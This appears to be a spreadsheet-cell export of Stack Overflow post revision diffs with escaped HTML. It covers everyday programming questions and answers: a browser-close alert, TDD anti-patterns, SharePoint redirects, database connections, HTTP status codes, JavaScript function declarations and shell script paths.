 &lt;p&gt; I tried following code to get an alert while closing browser window.&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&amp;lt;script language=&lt;span class="hljs-string"&gt;"JavaScript"&lt;/span&gt; type=&lt;span class="hljs-string"&gt;"text/javascript"&lt;/span&gt;&amp;gt;_x000D_
  &lt;span class="hljs-built_in"&gt;window&lt;/span&gt;.onbeforeunload = confirmExit;_x000D_
  &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;function&lt;/span&gt; &lt;span class="hljs-title"&gt;confirmExit&lt;/span&gt;(&lt;span class="hljs-params"&gt;&lt;/span&gt;)_x000D_
  &lt;/span&gt;{_x000D_
    &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-string"&gt;"You have attempted to leave this page.  If you have made any changes to the fields without clicking the Save button, your changes will be lost.  Are you sure you want to exit this page?"&lt;/span&gt;;_x000D_
  }_x000D_
&amp;lt;/script&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Its working but if the page contains one hyperlink,clicking on that same alert is coming.I need to show the alert only when i close the browser window and not on clicking hyperlinks.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I tried following code to get an alert while closing browser window.&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&amp;lt;script language=&lt;span class="hljs-string"&gt;"JavaScript"&lt;/span&gt; type=&lt;span class="hljs-string"&gt;"text/javascript"&lt;/span&gt;&amp;gt;_x000D_
  &lt;span class="hljs-built_in"&gt;window&lt;/span&gt;.onbeforeunload = confirmExit;_x000D_
  &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;function&lt;/span&gt; &lt;span class="hljs-title"&gt;confirmExit&lt;/span&gt;(&lt;span class="hljs-params"&gt;&lt;/span&gt;)_x000D_
  &lt;/span&gt;{_x000D_
    &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-string"&gt;"You have attempted to leave this page.  If you have made any changes to the fields without clicking the Save button, your changes will be lost.  Are you sure you want to exit this page?"&lt;/span&gt;;_x000D_
  }_x000D_
&amp;lt;/script&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Its working but if the page contains one hyperlink,clicking on that same alert is coming.I need to show the alert only when i close the browser window and not on clicking hyperlinks.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;Duplicate of&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/299679/java-servlet-how-to-detect-browser-closing" title="Java Servlet : How to detect browser closing ?"&gt;&lt;span class="diff-add"&gt;Java Servlet : How to detect browser closing ?&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; and some other. Just use the search facility... -- &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;PhiLho&lt;/span&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>PhiLho</t>
  </si>
  <si>
    <t>user42348</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;The Mockery&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Sometimes&lt;/span&gt; mocking can be good, and handy. But sometimes developers can lose themselves and in their effort to mock out what isnâ€™t being tested. In this case, a unit test contains so many mocks, stubs, and/or fakes that the system under test isnâ€™t even being tested at all, instead data returned from mocks is what is being tested.&lt;span class="diff-delete"&gt; (Source: &lt;/span&gt;&lt;a href="http://blog.james-carr.org/2006/11/03/tdd-anti-patterns/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;James Carr's post.&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Now you see me, now you don't&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; -- Children at play&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;The Mockery&lt;/strong&gt;&lt;br&gt;&lt;span class="diff-add"&gt; Sometimes&lt;/span&gt; mocking can be good, and handy. But sometimes developers can lose themselves and in their effort to mock out what isnâ€™t being tested. In this case, a unit test contains so many mocks, stubs, and/or fakes that the system under test isnâ€™t even being tested at all, instead data returned from mocks is what is being tested.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Source: James Carr's post.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Konerak</t>
  </si>
  <si>
    <t>Aaron Digulla</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;The Local Hero&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; A test case that is dependent on something specific to the development environment it was written on in order to run. The result is the test passes on development boxes, but fails when someone attempts to run it elsewhere.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;The Hidden Dependency&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Closely related to the local hero, a unit test that requires some existing data to have been populated somewhere before the test runs. If that data wasnâ€™t populated, the test will fail and leave little indication to the developer what it wanted, or whyâ€¦ forcing them to dig through acres of code to find out where the data it was using was supposed to come from.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; Sadly seen this far too many times with ancient .dlls which depend on nebulous and varied .ini files which are constantly out of sync on any given production system, let alone extant on your machine without extensive consultation with the three developers responsible for those dlls. Sigh.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Leave me alone, will you! It works for me!&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; -- Unknown Developer&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;The Local Hero&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; A test case that is dependent on something specific to the development environment it was written on in order to run. The result is the test passes on development boxes, but fails when someone attempts to run it elsewhere.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;The Hidden Dependency&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Closely related to the local hero, a unit test that requires some existing data to have been populated somewhere before the test runs. If that data wasnâ€™t populated, the test will fail and leave little indication to the developer what it wanted, or whyâ€¦ forcing them to dig through acres of code to find out where the data it was using was supposed to come from.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; Sadly seen this far too many times with ancient .dlls which depend on nebulous and varied .ini files which are constantly out of sync on any given production system, let alone extant on your machine without extensive consultation with the three developers responsible for those dlls. Sigh.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;The Cuckoo&lt;/strong&gt; -- Frank Carver&lt;br&gt; A unit test which sits in a test case with several others, and enjoys the same (potentially lengthy) setup process as the other tests in the test case, but then discards some or all of the artefacts from the setup and creates its own.&lt;br&gt; Advanced Symptom of : &lt;a href="http://stackoverflow.com/questions/333682/tdd-anti-patterns-catalogue#333870"&gt;Inappropriately Shared Fixture&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;One day, I might need it&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; -- Unknown Developer&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;The Cuckoo&lt;/strong&gt; -- Frank Carver&lt;br&gt; A unit test which sits in a test case with several others, and enjoys the same (potentially lengthy) setup process as the other tests in the test case, but then discards some or all of the artefacts from the setup and creates its own.&lt;br&gt; Advanced Symptom of : &lt;a href="http://stackoverflow.com/questions/333682/tdd-anti-patterns-catalogue#333870"&gt;Inappropriately Shared Fixture&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;The Silent Catcher&lt;/strong&gt; -- Kelly?&lt;br&gt; A test that passes if an exception is thrown.. even if the exception that actually occurs is one that is different than the one the developer intended.&lt;br&gt; See Also: &lt;a href="http://stackoverflow.com/questions/333682/tdd-anti-patterns-catalogue#334026"&gt;Secret Catcher&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;[Test]_x000D_
[ExpectedException(typeof(Exception))]_x000D_
public void ItShouldThrowDivideByZeroException()_x000D_
{_x000D_
   // some code that throws another exception yet passes the test_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;That can't ever happen ...&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; -- Comment in code&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;The Silent Catcher&lt;/strong&gt; -- Kelly?&lt;br&gt; A test that passes if an exception is thrown.. even if the exception that actually occurs is one that is different than the one the developer intended.&lt;br&gt; See Also: &lt;a href="http://stackoverflow.com/questions/333682/tdd-anti-patterns-catalogue#334026"&gt;Secret Catcher&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;[Test]_x000D_
[ExpectedException(typeof(Exception))]_x000D_
public void ItShouldThrowDivideByZeroException()_x000D_
{_x000D_
   // some code that throws another exception yet passes the test_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a SharePoint site extended for forms authentication. The Active Directory site is &lt;code&gt;example.com&lt;/code&gt; and the forms authentication site is &lt;code&gt;forms.example.com&lt;/code&gt;. When I type my (forms) username/password I get redirected (302) to the machine name (&lt;code&gt;moss-01&lt;/code&gt;) like so: &lt;code&gt;http://moss-01/&lt;/code&gt;. If I type &lt;code&gt;http://forms.example.com/&lt;/code&gt; into the address bar I am again redirected to &lt;code&gt;http://moss-01/&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Expected behavior is successful authentication into the forms site: &lt;code&gt;http://forms.example.com/Pages/Default.aspx&lt;/code&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Why am I being redirected to the machine name?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a SharePoint site extended for forms authentication. The Active Directory site is &lt;code&gt;example.com&lt;/code&gt; and the forms authentication site is &lt;code&gt;forms.example.com&lt;/code&gt;. When I type my (forms) username/password I get redirected (302) to the machine name (&lt;code&gt;moss-01&lt;/code&gt;) like so: &lt;code&gt;http://moss-01/&lt;/code&gt;. If I type &lt;code&gt;http://forms.example.com/&lt;/code&gt; into the address bar I am again redirected to &lt;code&gt;http://moss-01/&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Expected behavior is successful authentication into the forms site: &lt;code&gt;http://forms.example.com/Pages/Default.aspx&lt;/code&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Why am I being redirected to the machine name?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Thanks.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; We have a .NET object that does a lot of reading/writing with the database. Throughout the life cycle of this object (or the asp page that uses it), it may hit the database with a query/update anywhere from 1 to 10 times.&lt;/p&gt; _x000D_
 &lt;p&gt; Instead of opening and closing a database connection every time the object needs to hit the database, it simply opens a connection to the database during instantiation and then closes the connection during the object's termination event. Is that a bad practice?&lt;/p&gt; _x000D_
 &lt;p&gt; The assumption was that since the object hits the database every time it's instantiated (and usually multiple times), it would be better to just open a connection at the beginning of the object's life and then close it at the end.&lt;/p&gt; _x000D_
 &lt;p&gt; The other alternative is to open and close the database connection before and after each query/operation.&lt;/p&gt; _x000D_
 &lt;p&gt; What's the best practice here in order to maximize performance?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; We have a .NET object that does a lot of reading/writing with the database. Throughout the life cycle of this object (or the asp page that uses it), it may hit the database with a query/update anywhere from 1 to 10 times.&lt;/p&gt; _x000D_
 &lt;p&gt; Instead of opening and closing a database connection every time the object needs to hit the database, it simply opens a connection to the database during instantiation and then closes the connection during the object's termination event. Is that a bad practice?&lt;/p&gt; _x000D_
 &lt;p&gt; The assumption was that since the object hits the database every time it's instantiated (and usually multiple times), it would be better to just open a connection at the beginning of the object's life and then close it at the end.&lt;/p&gt; _x000D_
 &lt;p&gt; The other alternative is to open and close the database connection before and after each query/operation.&lt;/p&gt; _x000D_
 &lt;p&gt; What's the best practice here in order to maximize performance?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;update&lt;/span&gt;&lt;/strong&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt; Thanks for the tips guys. Can anyone speak more to the method of opening/closing a connection inside an object's instantiation/termination events and the repercussions of doing so?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Matias Nino</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Can anybody help me?&lt;/span&gt; I &lt;span class="diff-delete"&gt;need this: Given an&lt;/span&gt; input&lt;span class="diff-delete"&gt; like 'AaBbcdCDEb'&lt;/span&gt; from &lt;span class="diff-delete"&gt;a TextBox, I want to obtain&lt;/span&gt; the output &lt;span class="diff-delete"&gt;'ABCDE' or 'abcde' (it must contain&lt;/span&gt; only unique &lt;span class="diff-delete"&gt;alphabetical letters, there&lt;/span&gt; should&lt;span class="diff-delete"&gt; not&lt;/span&gt; be &lt;span class="diff-delete"&gt;any&lt;/span&gt; repeated &lt;span class="diff-delete"&gt;letters)&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Thanks, M.Aktar&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;If&lt;/span&gt; I &lt;span class="diff-add"&gt;give the&lt;/span&gt; input from &lt;span class="diff-add"&gt;Text Box like&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-add"&gt; AaBbcdCDEb&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; the output &lt;span class="diff-add"&gt;should be&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-add"&gt; ABCDE or abcde&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; only unique &lt;span class="diff-add"&gt;characters&lt;/span&gt; should be &lt;span class="diff-add"&gt;there, no&lt;/span&gt; repeated &lt;span class="diff-add"&gt;characters&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;How do I do this?&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Federico A. Ramponi</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have an application in which I have to store a couple of millions of integers, I have to store them in a Look up table, obviously I cannot store such amount of data in memory and in my requirements I am very limited I have to store the data in an embebedded system so I am very limited in the space, so I would like to ask you about recommended methods that I can use for the reduction of the look up table. I cannot use function approximation such as neural networks, the values needs to be in a table.&lt;/p&gt; _x000D_
 &lt;p&gt; Clearly I cannot store the real value of the integers and I need some type of approximation, I found one called tile coding &lt;a href="http://www.cs.ualberta.ca/%7Esutton/book/8/node6.html" rel="nofollow noreferrer"&gt;http://www.cs.ualberta.ca/~sutton/book/8/node6.html&lt;/a&gt;, this one is based on several look up tables, does anyone know any other method?.&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have an application in which I have to store a couple of millions of integers, I have to store them in a Look up table, obviously I cannot store such amount of data in memory and in my requirements I am very limited I have to store the data in an embebedded system so I am very limited in the space, so I would like to ask you about recommended methods that I can use for the reduction of the look up table. I cannot use function approximation such as neural networks, the values needs to be in a table.&lt;span class="diff-add"&gt; The range of the integers is not known at the moment. When I say integers I mean a 32 bit value.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Clearly I cannot store the real value of the integers and I need some type of approximation, I found one called tile coding &lt;a href="http://www.cs.ualberta.ca/%7Esutton/book/8/node6.html" rel="nofollow noreferrer"&gt;http://www.cs.ualberta.ca/~sutton/book/8/node6.html&lt;/a&gt;, this one is based on several look up tables, does anyone know any other method?.&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ryan</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The ones I'm using (that I could find with a quick &lt;code&gt;grep 'Status:'&lt;/code&gt; anyway):&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; 201: Sent whenever a form submission puts something significant into the database (forum post, user account, etc.)&lt;/li&gt; _x000D_
  &lt;li&gt; 304: HTTP caching. I've found this one is &lt;em&gt;very&lt;/em&gt; hard to get right since it has to account for users changing display settings and so on. The best idea I've come up with for that is using a hash of the user's preferences as the ETag. It doesn't help that most browsers have unpredictable and inconsistent behaviour here...&lt;/li&gt; _x000D_
  &lt;li&gt; 400: Used for bad form submissions that fail some validation check.&lt;/li&gt; _x000D_
  &lt;li&gt; 403: Used whenever someone is somewhere they shouldn't be (though I try to avoid that by not displaying links to stuff the users shouldn't access).&lt;/li&gt; _x000D_
  &lt;li&gt; 404: Apart from the normal webserver ones I use these when the URL contains invalid ID numbers. I suppose it'd be a good idea to check in this case whether a higher valid ID exists and send a 410 instead...&lt;/li&gt; _x000D_
  &lt;li&gt; 500: I tend to put these in catch{ } blocks where the only option is to give up, to make sure something meaningful is sent to the browser.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; I &lt;span class="diff-delete"&gt;realize&lt;/span&gt; I could get away with simply letting the server send "200" for everything, but they save a lot of pain when users are seeing (or causing) errors and not telling you about them. I've already got functions to display access-denied messages and so on, so it's not much work to add these anyway.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The ones I'm using (that I could find with a quick &lt;code&gt;grep 'Status:'&lt;/code&gt; anyway):&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; 201: Sent whenever a form submission puts something significant into the database (forum post, user account, etc.)&lt;/li&gt; _x000D_
  &lt;li&gt; 304: HTTP caching. I've found this one is &lt;em&gt;very&lt;/em&gt; hard to get right since it has to account for users changing display settings and so on. The best idea I've come up with for that is using a hash of the user's preferences as the ETag. It doesn't help that most browsers have unpredictable and inconsistent behaviour here...&lt;/li&gt; _x000D_
  &lt;li&gt; 400: Used for bad form submissions that fail some validation check.&lt;/li&gt; _x000D_
  &lt;li&gt; 403: Used whenever someone is somewhere they shouldn't be (though I try to avoid that by not displaying links to stuff the users shouldn't access).&lt;/li&gt; _x000D_
  &lt;li&gt; 404: Apart from the normal webserver ones I use these when the URL contains invalid ID numbers. I suppose it'd be a good idea to check in this case whether a higher valid ID exists and send a 410 instead...&lt;/li&gt; _x000D_
  &lt;li&gt; 500: I tend to put these in catch{ } blocks where the only option is to give up, to make sure something meaningful is sent to the browser.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; I &lt;span class="diff-add"&gt;realise&lt;/span&gt; I could get away with simply letting the server send "200" for everything, but they save a lot of pain when users are seeing (or causing) errors and not telling you about them. I've already got functions to display access-denied messages and so on, so it's not much work to add these anyway.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>user42092</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've recently started maintaining someone else's JavaScript code. I'm fixing bugs, adding features and also trying to tidy up the code and make it more consistent.&lt;/p&gt; _x000D_
 &lt;p&gt; The previous developer uses two ways of declaring functions and I can't work out if there is a reason behind it, or not.&lt;/p&gt; _x000D_
 &lt;p&gt; The two ways are:&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; functionOne = &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;function&lt;/span&gt;(&lt;span class="hljs-params"&gt;&lt;/span&gt;) &lt;/span&gt;{  _x000D_
  &lt;span class="hljs-comment"&gt;// Some code  &lt;/span&gt;_x000D_
}_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;function&lt;/span&gt; &lt;span class="hljs-title"&gt;functionTwo&lt;/span&gt;(&lt;span class="hljs-params"&gt;&lt;/span&gt;) &lt;/span&gt;{  _x000D_
  &lt;span class="hljs-comment"&gt;// Some code  &lt;/span&gt;_x000D_
}_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; What are the reasons for using these two different methods and what are the pros and cons of each? Is there anything that can be done with one method that can't be done with the other?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've recently started maintaining someone else's JavaScript code. I'm fixing bugs, adding features and also trying to tidy up the code and make it more consistent.&lt;/p&gt; _x000D_
 &lt;p&gt; The previous developer uses two ways of declaring functions and I can't work out if there is a reason behind it, or not.&lt;/p&gt; _x000D_
 &lt;p&gt; The two ways are:&lt;/p&gt; _x000D_
 &lt;code&gt;&lt;span class="diff-add"&gt; var functionOne = function() { &amp;nbsp;// Some code } &lt;/span&gt;&lt;/code&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;code&gt;&lt;span class="diff-add"&gt; function functionTwo() { &amp;nbsp;// Some code } &lt;/span&gt;&lt;/code&gt; _x000D_
 &lt;p&gt; What are the reasons for using these two different methods and what are the pros and cons of each? Is there anything that can be done with one method that can't be done with the other?&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Thanks for your help.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Richard Garside</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The &lt;code&gt;rel&lt;/code&gt; attribute is supposed to describe the relationship of the link to the current document. It should have one of the values described &lt;a href="http://www.w3.org/TR/html401/types.html#type-links" rel="nofollow noreferrer"&gt;here&lt;/a&gt;. A DIV is a block-level grouping element, whereas a SPAN is an inline grouping element. SPANs allow you to group text and tags together for some purpose (common styles, etc.) without changing the flow of the markup.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; As for question 3&lt;/span&gt;, &lt;span class="diff-delete"&gt;change the order of the selectors for the span style:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt; span.class1 { display: none; }_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The &lt;code&gt;rel&lt;/code&gt; attribute is supposed to describe the relationship of the link to the current document. It should have one of the values described &lt;a href="http://www.w3.org/TR/html401/types.html#type-links" rel="nofollow noreferrer"&gt;here&lt;/a&gt;. A DIV is a block-level grouping element, whereas a SPAN is an inline grouping element. SPANs allow you to group text and tags together for some purpose (common styles, etc.) without changing the flow of the markup.&lt;span class="diff-add"&gt; Without your example&lt;/span&gt;, &lt;span class="diff-add"&gt;I can't help more with your second question.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>tvanfosson</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Short answer:&lt;/p&gt; _x000D_
 &lt;pre class="lang-sh s-code-block hljs bash"&gt;&lt;code&gt;$(dirname&lt;span class="diff-delete"&gt; `readlink&lt;/span&gt; &lt;span class="diff-delete"&gt;-f &lt;span class="hljs-string"&gt;"&lt;span class="hljs-variable"&gt;$0&lt;/span&gt;"&lt;/span&gt;`&lt;/span&gt;)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Short answer:&lt;/p&gt; _x000D_
 &lt;pre class="lang-sh s-code-block hljs bash"&gt;&lt;code&gt;&lt;span class="diff-add"&gt;`dirname &lt;span class="hljs-variable"&gt;$0&lt;/span&gt;`_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; or&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre class="lang-sh s-code-block hljs bash"&gt;&lt;code&gt;$(dirname &lt;span class="diff-add"&gt;&lt;span class="hljs-variable"&gt;$0&lt;/span&gt;&lt;/span&gt;)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Fabien</t>
  </si>
  <si>
    <t>Jossef Harush</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I need to create a rectangle bubble with &lt;span class="diff-delete"&gt;round corner to put various texts&lt;/span&gt; inside, like a cartoon bubble. I need the bubble to expand horizontally and vertically depending on the size of the text it &lt;span class="diff-delete"&gt;contains, but all bubble needs to have to same corner radius and&lt;/span&gt; the &lt;span class="diff-delete"&gt;same&lt;/span&gt; arrow.&lt;/p&gt; _x000D_
 &lt;p&gt; I could simply use a path to create my bubble, but I can't resize the bubble and keep the corners radius and arrow constant... it's the whole path that will be resized.&lt;/p&gt; _x000D_
 &lt;p&gt; I'd appreciate that some one could point me in the right direction.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://img258.imageshack.us/img258/5088/bubblesstackoverflowbh4.gif" rel="nofollow noreferrer"&gt;alt text http://img258.imageshack.us/img258/5088/bubblesstackoverflowbh4.gif&lt;/a&gt;&lt;/p&gt; _x000D_
